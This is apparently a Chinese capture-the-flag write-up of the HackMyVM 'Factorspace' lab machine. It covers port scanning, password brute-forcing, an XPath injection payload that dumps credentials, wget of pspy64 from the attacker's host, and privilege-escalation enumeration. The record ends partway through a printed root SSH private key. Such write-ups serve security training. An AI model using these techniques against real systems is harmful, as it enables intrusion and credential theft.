[HackMyVM]靶场Factorspace

kali:192.168.56.104

靶机:192.168.56.138

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:38 CST
Nmap scan report for 192.168.56.138
Host is up (0.000081s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:DD:D8:ED (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

22 80 两个端口

浅扫一下目录

# gobuster dir -u http://192.168.56.138   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.138/images/]
/login.php            (Status: 200) [Size: 2346]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 19579]
/icon                 (Status: 301) [Size: 315] [--> http://192.168.56.138/icon/]
/results.php          (Status: 302) [Size: 115] [--> login.php]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.138/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.138/js/]
/check.php            (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.138/fonts/]
/parent               (Status: 301) [Size: 317] [--> http://192.168.56.138/parent/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

有login ，result，check，auth应该是登录相关的php

去web看一下

平平无奇，源码也没有什么值得注意的地方

直接去那几个php看试了一下其他几个都会跳转到login.php，那么只能从这里下手

登录界面还有验证码

随便输入抓个包看一下

post的内容发到了auth.php，有三个参数username，password，captcha

获取到验证码的是这个url

http://192.168.56.138/auth.php?generate_captcha=1

现在只能爆破密码了，盲猜用户名是admin

应该是一个会话内的验证码不变,防不了爆破

密码爆出来是iloveyou

登录之后是一个名字搜索框

测试了一下存在sql注入，但是为什么自己闭合会失效

在搜索引擎上搜了一下结果发现这是XPATH注入

然后在CSDN上搜到一个关于讲解XPATH注入的博客

浅谈Xpath注入漏洞-CSDN博客

里面给了这样一个payload

']|//*|//*['

就是']把前面的['闭合，后面的['闭合后面的']，然后//*是列出文档中的所有元素

$query="user/username[@name='']|//*|//*['';

通过这个payload爆出这三个人的密码

测试发现只有qyxG27KGkW0x9SJ1能登录jackie的ssh

┌──(root㉿kali2)-[~/Desktop]
└─# ssh jackie@192.168.56.138
jackie@192.168.56.138's password: 
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jackie@factorspace:~$ whoami
jackie

在jackie用户也是拿到了 user flag

jackie@factorspace:~$ ls -al
total 32
drwxr-xr-x 4 jackie jackie 4096 May  8  2023 .
drwxr-xr-x 3 root   root   4096 Apr  6  2023 ..
lrwxrwxrwx 1 root   root      9 Apr  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 jackie jackie  220 Apr 14  2023 .bash_logout
-rw-r--r-- 1 jackie jackie 3526 Apr 14  2023 .bashrc
drwxr-xr-x 3 jackie jackie 4096 Apr 14  2023 .local
-rw-r--r-- 1 jackie jackie  809 Apr 14  2023 .profile
drwx------ 2 jackie jackie 4096 Apr 14  2023 .ssh
-rwx------ 1 jackie jackie   33 Apr 14  2023 user.txt
jackie@factorspace:~$ cat user*
eb7d964a2a41006bb325cf822db664be

home下只有jackie一个用户，那就围绕它来提权

jackie@factorspace:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Apr  6  2023 .
drwxr-xr-x 18 root   root   4096 Feb  6  2023 ..
drwxr-xr-x  4 jackie jackie 4096 May  8  2023 jackie

sudo -l看一下

jackie@factorspace:~$ sudo -l
-bash: sudo: command not found

无果

看一下html文件有没有什么东西

jackie@factorspace:/var/www/html$ ls -al
total 76
drwxr-xr-x 8 root root  4096 May  8  2023 .
drwxr-xr-x 3 root root  4096 Apr  9  2023 ..
-rw-r--r-- 1 root root  2009 Apr 14  2023 auth.php
-rw-r--r-- 1 root root   214 Apr 14  2023 check.php
drwxr-xr-x 2 root root  4096 Apr 14  2023 css
-rw-r--r-- 1 root root   544 Apr 14  2023 employee_info_2023.xml
-rw-r--r-- 1 root root  1373 Apr 14  2023 employee_search_filter.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 fonts
drwxr-xr-x 2 root root  4096 Apr 14  2023 icon
drwxr-xr-x 2 root root  4096 Apr 14  2023 images
-rw-r--r-- 1 root root 19579 Apr 14  2023 index.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 industrial-html
drwxr-xr-x 3 root root  4096 Apr 14  2023 js
-rw-r--r-- 1 root root  2346 Apr 14  2023 login.php
-rw-r--r-- 1 root root   634 Apr 14  2023 results.php

无果

看定时任务

jackie@factorspace:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

无果

suid看一下

jackie@factorspace:/$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount

无果

看一下内核版本

jackie@factorspace:/$ uname -a
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux

挺新的，应该不是利用它

pspy64看一下进程

jackie@factorspace:~$ wget http://192.168.56.104:6677/pspy64
--2024-03-30 03:40:21--  http://192.168.56.104:6677/pspy64
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                          100%[=====================================================>]   2.94M  --.-KB/s    in 0.03s   

2024-03-30 03:40:21 (93.5 MB/s) - 'pspy64' saved [3078592/3078592]

jackie@factorspace:~$ chmod +x pspy64
jackie@factorspace:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/30 03:40:31 CMD: UID=1000 PID=987    | -bash 
2024/03/30 03:40:31 CMD: UID=1000 PID=986    | sshd: jackie@pts/0   
2024/03/30 03:40:31 CMD: UID=1000 PID=977    | (sd-pam) 
2024/03/30 03:40:31 CMD: UID=1000 PID=976    | /lib/systemd/systemd --user 
2024/03/30 03:40:31 CMD: UID=0    PID=973    | sshd: jackie [priv]  
2024/03/30 03:40:31 CMD: UID=0    PID=920    | 
2024/03/30 03:40:31 CMD: UID=0    PID=9      | 
2024/03/30 03:40:31 CMD: UID=0    PID=850    | 
2024/03/30 03:40:31 CMD: UID=33   PID=804    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=8      | 
2024/03/30 03:40:31 CMD: UID=0    PID=67     | 
2024/03/30 03:40:31 CMD: UID=0    PID=66     | 
2024/03/30 03:40:31 CMD: UID=0    PID=63     | 
2024/03/30 03:40:31 CMD: UID=0    PID=6      | 
2024/03/30 03:40:31 CMD: UID=33   PID=538    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=534    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=533    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=532    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=531    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=530    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=53     | 
2024/03/30 03:40:31 CMD: UID=33   PID=529    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=52     | 
2024/03/30 03:40:31 CMD: UID=0    PID=51     | 
2024/03/30 03:40:31 CMD: UID=0    PID=50     | 
2024/03/30 03:40:31 CMD: UID=0    PID=48     | 
2024/03/30 03:40:31 CMD: UID=0    PID=47     | 
2024/03/30 03:40:31 CMD: UID=0    PID=466    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=461    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2024/03/30 03:40:31 CMD: UID=0    PID=46     | 
2024/03/30 03:40:31 CMD: UID=0    PID=45     | 
2024/03/30 03:40:31 CMD: UID=0    PID=447    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/03/30 03:40:31 CMD: UID=0    PID=44     | 
2024/03/30 03:40:31 CMD: UID=0    PID=43     | 
2024/03/30 03:40:31 CMD: UID=0    PID=402    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2024/03/30 03:40:31 CMD: UID=0    PID=4      | 
2024/03/30 03:40:31 CMD: UID=0    PID=395    | /lib/systemd/systemd-logind 
2024/03/30 03:40:31 CMD: UID=0    PID=390    | /usr/sbin/rsyslogd -n -iNONE 
2024/03/30 03:40:31 CMD: UID=103  PID=376    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                     
2024/03/30 03:40:31 CMD: UID=0    PID=375    | /usr/sbin/cron -f 
2024/03/30 03:40:31 CMD: UID=0    PID=344    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:31 CMD: UID=0    PID=341    | 
2024/03/30 03:40:31 CMD: UID=104  PID=340    | /lib/systemd/systemd-timesyncd 
2024/03/30 03:40:31 CMD: UID=0    PID=338    | 
2024/03/30 03:40:31 CMD: UID=0    PID=337    | 
2024/03/30 03:40:31 CMD: UID=0    PID=336    | 
2024/03/30 03:40:31 CMD: UID=0    PID=334    | 
2024/03/30 03:40:31 CMD: UID=0    PID=331    | 
2024/03/30 03:40:31 CMD: UID=0    PID=329    | 
2024/03/30 03:40:31 CMD: UID=0    PID=326    | 
2024/03/30 03:40:31 CMD: UID=0    PID=322    | 
2024/03/30 03:40:31 CMD: UID=0    PID=316    | 
2024/03/30 03:40:31 CMD: UID=0    PID=3      | 
2024/03/30 03:40:31 CMD: UID=0    PID=250    | 
2024/03/30 03:40:31 CMD: UID=0    PID=25     | 
2024/03/30 03:40:31 CMD: UID=0    PID=24     | 
2024/03/30 03:40:31 CMD: UID=0    PID=23     | 
2024/03/30 03:40:31 CMD: UID=0    PID=22     | 
2024/03/30 03:40:31 CMD: UID=0    PID=21     | 
2024/03/30 03:40:31 CMD: UID=0    PID=205    | /lib/systemd/systemd-udevd 
2024/03/30 03:40:31 CMD: UID=0    PID=20     | 
2024/03/30 03:40:31 CMD: UID=0    PID=2      | 
2024/03/30 03:40:31 CMD: UID=0    PID=19     | 
2024/03/30 03:40:31 CMD: UID=0    PID=185    | /lib/systemd/systemd-journald 
2024/03/30 03:40:31 CMD: UID=0    PID=18     | 
2024/03/30 03:40:31 CMD: UID=0    PID=17     | 
2024/03/30 03:40:31 CMD: UID=0    PID=15     | 
2024/03/30 03:40:31 CMD: UID=0    PID=149    | 
2024/03/30 03:40:31 CMD: UID=0    PID=148    | 
2024/03/30 03:40:31 CMD: UID=0    PID=13     | 
2024/03/30 03:40:31 CMD: UID=1000 PID=1208   | ./pspy64 
2024/03/30 03:40:31 CMD: UID=0    PID=1207   | 
2024/03/30 03:40:31 CMD: UID=0    PID=1205   | /bin/sleep 10 
2024/03/30 03:40:31 CMD: UID=0    PID=12     | 
2024/03/30 03:40:31 CMD: UID=0    PID=112    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1106   | 
2024/03/30 03:40:31 CMD: UID=0    PID=110    | 
2024/03/30 03:40:31 CMD: UID=0    PID=11     | 
2024/03/30 03:40:31 CMD: UID=0    PID=109    | 
2024/03/30 03:40:31 CMD: UID=0    PID=108    | 
2024/03/30 03:40:31 CMD: UID=0    PID=107    | 
2024/03/30 03:40:31 CMD: UID=0    PID=106    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1055   | 
2024/03/30 03:40:31 CMD: UID=0    PID=105    | 
2024/03/30 03:40:31 CMD: UID=0    PID=104    | 
2024/03/30 03:40:31 CMD: UID=0    PID=10     | 
2024/03/30 03:40:31 CMD: UID=0    PID=1      | /sbin/init 
2024/03/30 03:40:31 CMD: UID=0    PID=1216   | /sbin/init 
2024/03/30 03:40:32 CMD: UID=0    PID=1217   | (sleep) 
2024/03/30 03:40:40 CMD: UID=0    PID=1218   | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:40 CMD: UID=0    PID=1219   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1220   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1221   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1222   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:42 CMD: UID=0    PID=1223   | /sbin/init 
2024/03/30 03:40:42 CMD: UID=0    PID=1224   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1225   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1226   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1227   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1228   | /sbin/init 
2024/03/30 03:41:12 CMD: UID=0    PID=1229   | /sbin/init 
2024/03/30 03:41:13 CMD: UID=0    PID=1230   | /sbin/init

无果

上linpeas看一下

依然无果

ps auxww看一下

jackie@factorspace:~/.ssh$  ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  1.0 163708 10048 ?        Ss   03:04   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    03:04   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/0:0H-events_highpri]
root           8  0.0  0.0      0     0 ?        I<   03:04   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_rude_]
root          10  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_trace]
root          11  0.3  0.0      0     0 ?        S    03:04   0:12 [ksoftirqd/0]
root          12  0.1  0.0      0     0 ?        I    03:04   0:04 [rcu_sched]
root          13  0.0  0.0      0     0 ?        S    03:04   0:00 [migration/0]
root          15  0.0  0.0      0     0 ?        S    03:04   0:00 [cpuhp/0]
root          17  0.0  0.0      0     0 ?        S    03:04   0:00 [kdevtmpfs]
root          18  0.0  0.0      0     0 ?        I<   03:04   0:00 [netns]
root          19  0.0  0.0      0     0 ?        S    03:04   0:00 [kauditd]
root          20  0.0  0.0      0     0 ?        S    03:04   0:00 [khungtaskd]
root          21  0.0  0.0      0     0 ?        S    03:04   0:00 [oom_reaper]
root          22  0.0  0.0      0     0 ?        I<   03:04   0:00 [writeback]
root          23  0.0  0.0      0     0 ?        S    03:04   0:00 [kcompactd0]
root          24  0.0  0.0      0     0 ?        SN   03:04   0:00 [ksmd]
root          25  0.0  0.0      0     0 ?        SN   03:04   0:00 [khugepaged]
root          43  0.0  0.0      0     0 ?        I<   03:04   0:00 [kintegrityd]
root          44  0.0  0.0      0     0 ?        I<   03:04   0:00 [kblockd]
root          45  0.0  0.0      0     0 ?        I<   03:04   0:00 [blkcg_punt_bio]
root          46  0.0  0.0      0     0 ?        I<   03:04   0:00 [edac-poller]
root          47  0.0  0.0      0     0 ?        I<   03:04   0:00 [devfreq_wq]
root          48  0.0  0.0      0     0 ?        I<   03:04   0:01 [kworker/0:1H-kblockd]
root          50  0.0  0.0      0     0 ?        S    03:04   0:00 [kswapd0]
root          51  0.0  0.0      0     0 ?        I<   03:04   0:00 [kthrotld]
root          52  0.0  0.0      0     0 ?        I<   03:04   0:00 [acpi_thermal_pm]
root          53  0.0  0.0      0     0 ?        I<   03:04   0:00 [ipv6_addrconf]
root          63  0.0  0.0      0     0 ?        I<   03:04   0:00 [kstrp]
root          66  0.0  0.0      0     0 ?        I<   03:04   0:00 [zswap-shrink]
root          67  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/u3:0]
root         105  0.0  0.0      0     0 ?        I<   03:04   0:00 [ata_sff]
root         106  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_0]
root         107  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_0]
root         108  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_1]
root         109  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_1]
root         110  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_2]
root         112  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_2]
root         148  0.0  0.0      0     0 ?        S    03:04   0:00 [jbd2/sda1-8]
root         149  0.0  0.0      0     0 ?        I<   03:04   0:00 [ext4-rsv-conver]
root         185  0.0  1.7  48412 17656 ?        Ss   03:04   0:01 /lib/systemd/systemd-journald
root         205  0.0  0.5  21592  5156 ?        Ss   03:04   0:00 /lib/systemd/systemd-udevd
root         250  0.0  0.0      0     0 ?        I<   03:04   0:00 [cryptd]
root         316  0.0  0.0      0     0 ?        S    03:04   0:00 [irq/18-vmwgfx]
root         322  0.0  0.0      0     0 ?        I<   03:04   0:00 [ttm_swap]
root         326  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc0]
root         329  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc1]
root         331  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc2]
root         334  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc3]
root         336  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc4]
root         337  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc5]
root         338  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc6]
systemd+     340  0.0  0.6  88440  6004 ?        Ssl  03:04   0:00 /lib/systemd/systemd-timesyncd
root         341  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc7]
root         344  0.0  0.5  99888  5740 ?        Ssl  03:04   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         375  0.0  0.2   6748  2656 ?        Ss   03:04   0:00 /usr/sbin/cron -f
message+     376  0.0  0.4   8256  4656 ?        Ss   03:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         390  0.0  0.4 220800  4032 ?        Ssl  03:04   0:00 /usr/sbin/rsyslogd -n -iNONE
root         395  0.0  0.7  22056  7184 ?        Ss   03:04   0:00 /lib/systemd/systemd-logind
root         402  0.0  0.5  14620  5152 ?        Ss   03:04   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root         447  0.0  0.1   5848  1708 tty1     Ss+  03:04   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         461  0.0  0.7  13356  7720 ?        Ss   03:04   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         466  0.0  2.3 208608 23084 ?        Ss   03:04   0:00 /usr/sbin/apache2 -k start
www-data     529  0.8  1.8 209260 18452 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     530  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     531  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     532  0.8  1.8 209260 18532 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     533  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     534  0.8  1.7 209260 17456 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     538  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     804  0.6  1.7 209260 17460 ?        S    03:19   0:15 /usr/sbin/apache2 -k start
root         850  0.0  0.0      0     0 ?        I    03:22   0:00 [kworker/u2:2-flush-8:0]
root         920  0.0  0.0      0     0 ?        I    03:27   0:00 [kworker/u2:1-events_unbound]
root         973  0.0  0.9  14716  9068 ?        Ss   03:31   0:00 sshd: jackie [priv]
jackie       976  0.0  0.7  15184  7756 ?        Ss   03:31   0:00 /lib/systemd/systemd --user
jackie       977  0.0  0.2 166664  2580 ?        S    03:31   0:00 (sd-pam)
jackie       986  0.0  0.5  14716  5880 ?        S    03:31   0:00 sshd: jackie@pts/0
jackie       987  0.0  0.5   8512  5136 pts/0    Ss   03:31   0:00 -bash
root        1207  0.1  0.0      0     0 ?        I    03:40   0:02 [kworker/0:0-events]
root       12269  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/0:1-ata_sff]
root       12270  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/u2:0-flush-8:0]
root       12344  0.0  0.0      0     0 ?        I    04:01   0:00 [kworker/0:2-ata_sff]
root       12350  0.0  0.0   5368   500 ?        Ss   04:01   0:00 /bin/sleep 10
jackie     12351  0.0  0.3   9760  3244 pts/0    R+   04:01   0:00 ps auxww

也是没有东西

看一下端口情况

jackie@factorspace:~$ ss -tulnp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port       Process       
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*                        
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*                        
tcp         LISTEN       0            511                            *:80                          *:*                        
tcp         LISTEN       0            128                         [::]:22                       [::]:*

擦，汗流浃背了，啥也没有

无奈之下去看了一手wp，发现他们在ss -tulnp有个特殊的udp，为什么我没有，靶机重启了一下还是没有，我淦

可能是我靶机和kali的网卡不一样

不管了，后面就是通过wireshark抓192.168.56.138的udp包，报文里面有个私钥，用私钥登录root就能拿到root权限

┌──(root㉿kali2)-[~/Desktop]
└─# cat id        
-----BEGIN OPENSSH PRIVATE KEY-----
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
